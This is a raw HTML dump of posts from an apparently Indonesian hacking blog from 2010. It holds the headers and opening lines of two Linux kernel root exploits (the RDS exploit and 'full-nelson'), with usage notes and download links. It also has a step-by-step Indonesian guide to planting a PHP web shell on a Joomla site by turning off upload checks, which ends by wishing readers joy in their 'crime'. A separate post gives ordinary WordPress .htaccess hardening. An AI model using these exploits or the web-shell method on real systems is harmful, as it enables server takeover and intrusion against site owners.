class="content"> </td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <stdio.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <stdlib.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <stdint.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <string.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <errno.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <unistd.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <fcntl.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <sys/types.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <sys/ioctl.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <sys/utsname.h></code></td></tr></tbody></table></div><code class="cpp preprocessor">#include <sys/mman.h><br /><br /><a href="http://www.exploit-db.com/exploits/15150/"><span style="font-weight: bold;">Download Full</span></a><br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-4247201541378107373?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/xlPtZ8FTbt8Wd0t23Hg-vcP18ew/0/da"><img src="http://feedads.g.doubleclick.net/~a/xlPtZ8FTbt8Wd0t23Hg-vcP18ew/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/xlPtZ8FTbt8Wd0t23Hg-vcP18ew/1/da"><img src="http://feedads.g.doubleclick.net/~a/xlPtZ8FTbt8Wd0t23Hg-vcP18ew/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/dyA7iZlRuD4" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2010/12/linux-kernel-2636-kernel-memory.htmltag:blogger.com,1999:blog-5679666230684006712.post-14570256482518944672010-12-27T18:17:00.000+07:002011-01-17T18:18:50.774+07:002011-01-17T18:18:50.774+07:00<code class="cpp comments">/* </code><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* CVE-2010-3904</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* by Dan Rosenberg <drosenberg@vsecurity.com></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Copyright 2010 Virtual Security Research, LLC</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* The handling functions for sending and receiving RDS messages</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* use unchecked __copy_*_user_inatomic functions without any</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* access checks on user-provided pointers. As a result, by</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* passing a kernel address as an iovec base address in recvmsg-style</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* calls, a local user can overwrite arbitrary kernel memory, which</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* can easily be used to escalate privileges to root. Alternatively,</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* an arbitrary kernel read can be performed via sendmsg calls.</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* This exploit is simple - it resolves a few kernel symbols,</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* sets the security_ops to the default structure, then overwrites</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* a function pointer (ptrace_traceme) in that structure to point</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* to the payload. After triggering the payload, the original</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* value is restored. Hard-coding the offset of this function</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* pointer is a bit inelegant, but I wanted to keep it simple and</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* architecture-independent (i.e. no inline assembly).</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* The vulnerability is yet another example of why you shouldn't</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* allow loading of random packet families unless you actually</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* need them.</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Greets to spender, kees, taviso, hawkes, team lollerskaters,</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* joberheide, bla, sts, and VSR</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*/</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"> </td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"> </td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <stdio.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <unistd.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <stdlib.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <fcntl.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <sys/types.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <sys/socket.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <netinet/in.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <errno.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <string.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <sys/ptrace.h></code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#include <sys/utsname.h></code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"> </td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#define RECVPORT 5555 </code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="cpp preprocessor">#define SENDPORT 6666</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"> </td></tr></tbody></table></div><code class="cpp color1 bold">int</code> <code class="cpp plain">prep_sock(</code><code class="cpp color1 bold">int</code> <code class="cpp plain">port)<br /><a href="http://www.exploit-db.com/exploits/15285/"><br /><span style="font-weight: bold;">Download Full</span></a><br /><br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1457025648251894467?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/vL4bkcvM4UBdX-JmJfPxschx_GA/0/da"><img src="http://feedads.g.doubleclick.net/~a/vL4bkcvM4UBdX-JmJfPxschx_GA/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/vL4bkcvM4UBdX-JmJfPxschx_GA/1/da"><img src="http://feedads.g.doubleclick.net/~a/vL4bkcvM4UBdX-JmJfPxschx_GA/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/mXrFPF4t_EY" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2010/12/linux-rds-protocol-local-privilege.htmltag:blogger.com,1999:blog-5679666230684006712.post-91923255577638010382010-12-27T08:25:00.008+07:002010-12-28T19:37:45.441+07:002010-12-28T19:37:45.441+07:00Ada simple trik untuk mengupload shell di cms joomla, mungkin udah banyak yang tahu tentang ini. Sebenarnya memakai aplikasi kayak ninja explorer juga bisa sih, tapi kalau koneksi kita lemot kan agak lumayan merepotkan ,atau kalau gak si admin setting biar tidak ada aplikasi yang boleh di install, nah ini caranya gan, lebih praktis juga loh. Langsung aja lah..<div style="text-align: justify;" class="entry"> <p>Persiapan pertama sudah ada site joomla yang jadi target, sama siapkan shell/ injector. Kalau semua sudah beres langsung saja kita praktekkan.<br />jangan lupa kopi + rokok, biar lancar awkakwkakwkawk</p> <p>1. Kalau sudah masuk di cmsnya kan ada tuh menu-menu atau kotak-kotak dibagian tengah, atau klik site > pilih Global Configuration, kalau udah Pilih System, lihat gambar dibawah ini.</p><div style="text-align: center;"><a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf2xZGB57I/AAAAAAAAAEI/bK4pRIRqOLk/s1600/joom2-300x216.png"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 300px; height: 216px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf2xZGB57I/AAAAAAAAAEI/bK4pRIRqOLk/s320/joom2-300x216.png" alt="" id="BLOGGER_PHOTO_ID_5555179993794996146" border="0" /></a></div> <p>2. Pada bagian Media Settings, <strong>Legal Extensions (File Types)</strong> kita harus merubah salah satu ekstensi disitu contoh yang bisa kita rubah adalah ODP atau ODG ada juga JPG. Rubahlah jadi PHP, kalau sudah liaht pada bagian <strong>Restrict Uploads</strong> dan <strong>Check MIME Types</strong>, kalau default itu di centang ke YES, nah kita rubah lah jadi NO.<br />Perhatiin pada bagian <strong>Legal MIME Types</strong> nah pada bagian disitu kan banyak tuh tulisan kayak image/jpeg,image/gif,image dll lah, pilih pada bagian belakang klo gak salah X-ZIP atau yang mana aja terserah pokoknya rubah jadi PHP. Kalau sudah di save then NEXT STEP.</p><div style="text-align: center;"><a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf3AbvheFI/AAAAAAAAAEQ/kUlAI9zP2cs/s1600/joom3-300x277.png"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 300px; height: 277px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf3AbvheFI/AAAAAAAAAEQ/kUlAI9zP2cs/s320/joom3-300x277.png" alt="" id="BLOGGER_PHOTO_ID_5555180252203939922" border="0" /></a></div><p>3. Pada langkah nomor 2 kalau berahasil ada tulisan “The Global Configuration details have been updated.” klo gagal “An Error has occurred! Unable to open configuration.php file to write!”.Kalau ternyata gagal, anda bisa melakukan cara lain dengan mengganti source index.php templates dengan source injector kamu.<br />disini kita ngomongin yang berhasil, kalau berahasil pilih <strong>MEDIA MANAGER</strong>. Perhatikan pada bagian bawah, Upload file injector atau shell anda. misalkan : shell.php<br />kalau sukses, hasilnya seperti screen shoot dibawah ini..</p><p style="text-align: center;"><a href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf3KljsI8I/AAAAAAAAAEY/43Mk0CO1_P4/s1600/joom5-300x178.png"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 311px; height: 185px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TRf3KljsI8I/AAAAAAAAAEY/43Mk0CO1_P4/s320/joom5-300x178.png" alt="" id="BLOGGER_PHOTO_ID_5555180426637353922" border="0" /></a></p> <p>4. Selanjutnya pemanggilan URL shell nya seperti ini: <strong>http://[localhost]/images/shell.php</strong> </p> <p>Mudah kan,gagaga...selamat menikmati hasil kejahatan anda..<br />Just share buat newbie,yang udah mastah dilarang keras baca ini artikel..!!</p> </div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-9192325557763801038?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/NRwUHoJm_r0uioypIG3RxG4INEo/0/da"><img src="http://feedads.g.doubleclick.net/~a/NRwUHoJm_r0uioypIG3RxG4INEo/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/NRwUHoJm_r0uioypIG3RxG4INEo/1/da"><img src="http://feedads.g.doubleclick.net/~a/NRwUHoJm_r0uioypIG3RxG4INEo/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/K7FnZii7YwY" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2010/12/easy-upload-shell-in-joomla.htmltag:blogger.com,1999:blog-5679666230684006712.post-62397519613984845112010-12-27T07:28:00.000+07:002010-12-27T08:38:06.281+07:002010-12-27T08:38:06.281+07:00<div style="text-align: justify;" class="entry"> <p>Kembali lagi ma ane gan, kali ini kita membahas soal keamanan wordpress,kita membahas salah satu keamanan seperti judul di atas, dengan file <strong>.htaccess</strong>. Mungkin banyak yang sudah tahu atau yang sudah membahas tentang ini,tapi tidak ada salahnya jika mau dishare lagi.. <img src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> </p> <p> </p> <p>Mari kita bahas tentang file <strong>.htaccess</strong>,apa itu <em><strong>.htacess</strong></em>..? file <strong>.htaccess</strong> adalah file teks <em><strong>ASCII</strong></em> yang terletak di dalam root direktori biasanya “<strong>public_html</strong>” atau klo hosting free di “<strong>htdocs</strong>” <span id="more-206"></span>yang sering digunakan untuk mengubah pengaturan default dari web server yang digunakan. Sehingga manfaat dari file <strong>.htaccess</strong> ini besar sekali. Dan merupakan Web Utility yang sering digunakan oleh para web master.<br />lalu apa saja yang harus di amankan di wordpress.?bnyak gan,conthnya <strong>/wp-admin</strong>,<strong>/wp-includes</strong>,<strong>wp-login.php</strong>,<strong>wp-db.php</strong>,<strong>wp-config.php</strong> ./etc..<br />langsung aja gan, source code yang nanti ane kasih agan tinggal copy lalu paste aja di .htaccess,udah tahu kali.. <img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /></p><p><strong>Akses halaman /Wp-Admin Login dengan Private IP/Single IP</strong></p> <blockquote><p>AuthUserFile /dev/null</p> <p>AuthGroupFile /dev/null</p> <p>AuthName “Access Control”</p> <p>AuthType Basic</p> <p>order deny,allow</p> <p>deny from all</p> <p># IP address sobat</p> <p>allow from<strong> <span style="color: rgb(255, 0, 0);">**.***.***.**</span></strong></p></blockquote> <p>Coba perhatikan sama huruf yang berwarna merah itu gan, <span style="color: rgb(255, 0, 0);"><strong>**.***.***.**</strong></span> rubah sama IP agan,jadi khusus satu IP aja yang bisa akses halaman itu.. <img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /><br />Terus gimana dengan wp-login.php itu juga sama kan buat login..? Hmm tenang gan, kita lanjut ke wp-login.php, pake private IP juga.. <img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> </p> <blockquote><p><files></p> <p>Order deny,allow</p> <p>Deny from All</p> <p>Allow from <span style="color: rgb(255, 0, 0);"><strong>**.***.***.**</strong></span></p> <p></files></p></blockquote> <p><span style="color: rgb(255, 0, 0);"> </span>sama seperti diatas, ganti tulisan yang berwarna merah pake IP agan, kalau buat yang IP nya dinamis mending tidak usah, coz itu cuma buat satu IP doanq,</p> <p><strong>Amankan Wp-Config.php</strong></p> <p>Lanjut gan,sekarang kita mw amanin file wp-config.php,dh tahu kan wp-config.php itu kegunaanya,maka dari itu mari kita amankan.. <img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /><br />nih codenya..</p> <blockquote><p># protect wpconfig.php</p> <p><files></p> <p>order allow,deny</p> <p>deny from all</p> <p></files></p></blockquote> <p>Selajutnya kita bahas kebagian direktori Wp-includes,nah klo kata orang-orang sih di dalem direktori wp-includes itu ada wp-db.php yang bisa ngebongkar semua data penting kita gan,<br />buat jaga-jaga wp-includes dari serangan yang gk berwenang buat file index.php atau index.html di direktori itu gan. Untuk wp-db.php coba agan akses, adanya di wp-includes/wp-db.php pasti terjadi error gitu kan, klo emang disitu kelemahanya marilah kita tutupi, caranya buat file .htaccess dibagian di rektori wp-includes, terus isi sama code ini..</p> <blockquote><p><ifmodule><br />RewriteEngine On<br />RewriteBase /<br />RewriteRule .*\.php$ <span style="color: rgb(255, 0, 0);">readme.html</span> [L]<br /></ifmodule></p></blockquote> <p>Perhatikan sama tulisan yang berwarna merah itu, itu file readme dari wordpress, nah kita coba mengalihkan file wp-db.php ke file readme.html dengan cara di atas.</p> <p>Ok selesai,semoga bermanfaat dan berguna.. <img style="display: inline;" src="http://nubiee.uni.cc/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> </p> </div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6239751961398484511?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/srXTYVVGaNtUXFTfA_4GqHJZELs/0/da"><img src="http://feedads.g.doubleclick.net/~a/srXTYVVGaNtUXFTfA_4GqHJZELs/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/srXTYVVGaNtUXFTfA_4GqHJZELs/1/da"><img src="http://feedads.g.doubleclick.net/~a/srXTYVVGaNtUXFTfA_4GqHJZELs/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/1I2hmN_s-x8" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2010/12/protect-wordpress-directory-with.htmltag:blogger.com,1999:blog-5679666230684006712.post-65559786988696052592010-12-20T18:15:00.000+07:002011-01-17T18:16:53.126+07:002011-01-17T18:16:53.126+07:00<code class="cpp comments">/*</code><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Linux Kernel <= 2.6.37 local privilege escalation</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* by Dan Rosenberg</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* @djrbliss on twitter</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Usage:</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* gcc full-nelson.c -o full-nelson</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* ./full-nelson</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* This exploit leverages three vulnerabilities to get root, all of which were</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* discovered by Nelson Elhage:</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* CVE-2010-4258</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* -------------</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* This is the interesting one, and the reason I wrote this exploit. If a</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* word will be written to a user-specified pointer when that thread exits.</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* This write is done using put_user(), which ensures the provided destination</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* resides in valid userspace by invoking access_ok(). However, Nelson</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* discovered that when the kernel performs an address limit override via</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* etc.), this override is not reverted before calling put_user() in the exit</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* path, allowing a user to write a NULL word to an arbitrary kernel address.</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Note that this issue requires an additional vulnerability to trigger.</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* CVE-2010-3849</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* -------------</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* This is a NULL pointer dereference in the Econet protocol. By itself, it's</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* fairly benign as a local denial-of-service. It's a perfect candidate to</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* trigger the above issue, since it's reachable via sock_no_sendpage(), which</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* subsequently calls sendmsg under KERNEL_DS.</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* CVE-2010-3850</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* -------------</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* I wouldn't be able to reach the NULL pointer dereference and trigger the</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* OOPS if users weren't able to assign Econet addresses to arbitrary</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* interfaces due to a missing capabilities check.</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* In the interest of public safety, this exploit was specifically designed to</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* be limited:</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* * The particular symbols I resolve are not exported on Slackware or Debian</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* * Red Hat does not support Econet by default</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Debian</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* However, the important issue, CVE-2010-4258, affects everyone, and it would</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* more sophisticated version of this that doesn't have the roadblocks I put in</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* to prevent abuse by script kiddies.</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* NOTE: the exploit process will deadlock and stay in a zombie state after you</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* exit your root shell because the Econet thread OOPSes while holding the</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">*</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><code class="spaces"> </code><code class="cpp comments">* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla</code></td></tr></tbody></table></div><code class="spaces"> </code><code class="cpp comments">*/<br /><br /><a href="http://www.exploit-db.com/exploits/15704/"><span style="font-weight: bold;">Download Full</span></a><br /></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6555978698869605259?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/yiVnSoxkj20hNeh9ru1PTuyYuJ8/0/da"><img src="http://feedads.g.doubleclick.net/~a/yiVnSoxkj20hNeh9ru1PTuyYuJ8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/yiVnSoxkj20hNeh9ru1PTuyYuJ8/1/da"><img src="http://feedads.g.doubleclick.net/~a/yiVnSoxkj20hNeh9ru1PTuyYuJ8/1/di" border="0" ismap="true"></img></a></p><img 